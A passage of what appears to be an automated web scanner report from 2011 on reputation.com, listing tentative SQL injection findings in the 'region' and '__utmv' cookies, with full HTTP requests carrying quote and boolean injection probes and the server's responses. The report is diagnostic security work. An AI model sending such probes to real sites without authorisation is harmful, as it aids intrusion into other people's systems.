Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:12:19 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:12:19 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:12:19 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:12:19 GMT; path=/
Set-Cookie: shoppingCart=qua93ksa55ud9ln7chqb63fue4; expires=Sat, 19-Apr-2014 02:12:20 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 124259
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.17. http://www.reputation.com/contact [region cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reputation.com
Path:   /contact

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /contact HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 01:52:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /contact HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:52:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=cr9mtt4r59r253pvqk5sko5292; expires=Sat, 19-Apr-2014 01:52:02 GMT; path=/; domain=www.reputation.com
Set-Cookie: repdef_ref_code=RCPT2; expires=Thu, 19-May-2011 01:52:02 GMT; path=/
Vary: Accept-Encoding
Content-Length: 124863
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.18. http://www.reputation.com/how_to/ [__utmv cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reputation.com
Path:   /how_to/

Issue detail

The __utmv cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the __utmv cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /how_to/ HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/contact
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv='%20and%201%3d1--%20; uuid=4dacead2acca8; repdef_ref_code=RCPT2; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=31AF1EF9; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D47%2C; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A4%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A4%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A4; shoppingCart=cr9mtt4r59r253pvqk5sko5292; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.42.8.1303178155074

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 02:22:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:13 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:13 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:13 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:13 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:13 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:13 GMT; path=/
Set-Cookie: shoppingCart=2g3o1bqq41sjkp0f1vq0sv54e1; expires=Sat, 19-Apr-2014 02:22:14 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 145959
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- Elapsed Time: 0.43764305114746 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Reputation.com has grown to be the world's first comprehensive online reputation management and privacy company.We're the most experienced and most technologically innovative reputation management company of our kind. With customers in over 35 countries, Reputation.com is proud to serve a global customer base." />
<meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE" />
<meta name="keywords" content="reputation management, online reputation management, reputation" />
<meta name="verify-v1" content="pi1LQRAKD+naJaDzv4PlrqmDzEfov8Noj8ypwExi1d8=" />
<meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PA RSER_COMPATIBLE" />
<title>How To : Reputation.com</title>
<script type="text/javascript">
var GB_ROOT_DIR = "/secure/greybox/";
</script>

<!--necessary for Museo embed-->
<!--
/*
* MyFonts Webfont Build ID 742178, 2011-04-04T18:53:00-0400
*
* The fonts listed in this notice are subject to the End User License
* Agreement(s) entered into by the website owner. All other parties are
* explicitly restricted from using the Licensed Webfonts(s).
*
* You may obtain a valid license at the URLs below.
*
* Webfont: Museo Sans 700
* URL: http://new.myfonts.com/fonts/exljbris/museo-sans/700/
* Foundry: exljbris
* Copyright: Copyright (c) 2008 by Jos Buivenga. All rights reserved.
* License: http://www.myfonts.com/viewlicense?1056
* Licensed pageviews: 10,000,000/month
* CSS font-family: MuseoSans-700
* CSS font-weight: normal
*
* Webfont: Museo Sans 300
* URL: http://new.myfonts.com/fonts/exljbris/museo-sans/300/
* Foundry: exljbris
* Copyright: Copyright (c) 2008 by Jos Buivenga. All rights reserved.
* License: http://www.myfonts.com/viewlicense?1056
* Licensed pageviews: 10,000,000/month
* CSS font-
...[SNIP]...

Request 2

GET /how_to/ HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/contact
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv='%20and%201%3d2--%20; uuid=4dacead2acca8; repdef_ref_code=RCPT2; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=31AF1EF9; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D47%2C; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A4%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A4%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A4; shoppingCart=cr9mtt4r59r253pvqk5sko5292; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.42.8.1303178155074

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 02:22:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:15 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:15 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:15 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:15 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:15 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:22:15 GMT; path=/
Set-Cookie: shoppingCart=2g3o1bqq41sjkp0f1vq0sv54e1; expires=Sat, 19-Apr-2014 02:22:16 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 145937
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- Elapsed Time: 0.46067905426025 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Reputation.com has grown to be the world's first comprehensive online reputation management and privacy company.We're the most experienced and most technologically innovative reputation management company of our kind. With customers in over 35 countries, Reputation.com is proud to serve a global customer base." />
<meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE" />
<meta name="keywords" content="reputation management, online reputation management, reputation" />
<meta name="verify-v1" content="pi1LQRAKD+naJaDzv4PlrqmDzEfov8Noj8ypwExi1d8=" />
<meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PA RSER_COMPATIBLE" />
<title>How To : Reputation.com</title>
<script type="text/javascript">
var GB_ROOT_DIR = "/secure/greybox/";
</script>

<!--necessary for Museo embed-->
<!--
/*
* MyFonts Webfont Build ID 742178, 2011-04-04T18:53:00-0400
*
* The fonts listed in this notice are subject to the End User License
* Agreement(s) entered into by the website owner. All other parties are
* explicitly restricted from using the Licensed Webfonts(s).
*
* You may obtain a valid license at the URLs below.
*
* Webfont: Museo Sans 700
* URL: http://new.myfonts.com/fonts/exljbris/museo-sans/700/
* Foundry: exljbris
* Copyright: Copyright (c) 2008 by Jos Buivenga. All rights reserved.
* License: http://www.myfonts.com/viewlicense?1056
* Licensed pageviews: 10,000,000/month
* CSS font-family: MuseoSans-700
* CSS font-weight: normal
*
* Webfont: Museo Sans 300
* URL: http://new.myfonts.com/fonts/exljbris/museo-sans/300/
* Foundry: exljbris
* Copyright: Copyright (c) 2008 by Jos Buivenga. All rights reserved.
* License: http://www.myfonts.com/viewlicense?1056
* Licensed pageviews: 10,000,000/month
* CSS font-
...[SNIP]...

1.19. http://www.reputation.com/how_to/ [region cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reputation.com
Path:   /how_to/

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /how_to/ HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=20290C1D; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; uuid=4dacea0c0f343; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.5.9.1303177777739; _bizo_np_stats=753%3D327%2C; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A1%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A1%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A1

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 01:56:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /how_to/ HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=20290C1D; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; uuid=4dacea0c0f343; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.5.9.1303177777739; _bizo_np_stats=753%3D327%2C; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A1%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A1%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A1

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:56:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:56:06 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:56:06 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:56:06 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:56:06 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:56:06 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 01:56:06 GMT; path=/
Set-Cookie: shoppingCart=8iolc1p0lpi3p35vnlqv8dk0r5; expires=Sat, 19-Apr-2014 01:56:07 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 98933
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- Elapsed Time: 0.7201230525970
...[SNIP]...

1.20. http://www.reputation.com/how_to/talk-with-your-kids-about-social-media-safety/ [region cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reputation.com
Path:   /how_to/talk-with-your-kids-about-social-media-safety/

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /how_to/talk-with-your-kids-about-social-media-safety/ HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/how_to/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; repdef_ref_code=RCPT2; uuid=4daceb8bb1719; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=3243BE4E; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D131%2C; __ar_v4=FWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A6%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A6%7CADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A6; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.50.9.1303178295497; shoppingCart=cr9mtt4r59r253pvqk5sko5292

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 02:20:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /how_to/talk-with-your-kids-about-social-media-safety/ HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/how_to/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; repdef_ref_code=RCPT2; uuid=4daceb8bb1719; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=3243BE4E; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D131%2C; __ar_v4=FWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A6%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A6%7CADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A6; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.50.9.1303178295497; shoppingCart=cr9mtt4r59r253pvqk5sko5292

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 02:20:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:20:28 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:20:28 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:20:28 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:20:28 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:20:28 GMT; path=/
Set-Cookie: uuid=deleted; expires=Mon, 19-Apr-2010 02:20:28 GMT; path=/
Set-Cookie: shoppingCart=2g3o1bqq41sjkp0f1vq0sv54e1; expires=Sat, 19-Apr-2014 02:20:29 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 204462
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- Elapsed Time: 1.4132390022278
...[SNIP]...

1.21. http://www.reputation.com/itemadded [region cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reputation.com
Path:   /itemadded

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /itemadded HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; repdef_ref_code=RCPT2; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=84D716E1; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D458%2C; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A8%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A8%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A8; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.56.8.1303178441001; uuid=4daceca02633e; shoppingCart=cr9mtt4r59r253pvqk5sko5292

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 02:07:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /itemadded HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
